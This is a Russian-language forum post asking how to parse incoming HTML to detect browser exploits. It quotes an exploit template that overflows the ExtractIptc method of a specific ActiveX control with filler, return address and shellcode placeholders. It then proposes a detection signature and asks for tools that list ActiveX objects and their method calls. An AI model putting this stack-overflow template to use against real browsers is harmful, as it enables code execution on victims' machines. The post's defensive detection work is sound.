парсим приходящие HTML для борьбы с эксплоитами
Всем добрый день!
Например есть эксплоит, который создает html страницу:
<html>
<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
<script language='javascript'>
#{rand1} = unescape('#{filler}');
while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');
#{rand2} = unescape('#{jmp}');
#{rand3} = unescape('#{ret}');
#{rand4} = unescape('#{sc}');
#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
#{vname}.ExtractIptc = #{strname};
</script>
</html>
Уязвимость в том, что ExtractIptc получает очень большое значение и возникает переполнение стека. Сигнатура будет выглядеть следующим образом: если методу ExtractIptc, объекта класса 5C6698D9-7BE4-4122-8EC5-291D84DBD4A0 передается параметр большого размера, то это можно считать атакой!!!
Перед отображением в браузере этой страницы можно проверять и детектировать атаки но прямой парсинг несет некоторые сложности.
Хочу спросить у вас: имеется ли технология, позволяющая просто получить из html список ActiveX, которые он будет подгружать + список методов этих ActiveX с параметрами, с которыми они будут вызываться?
|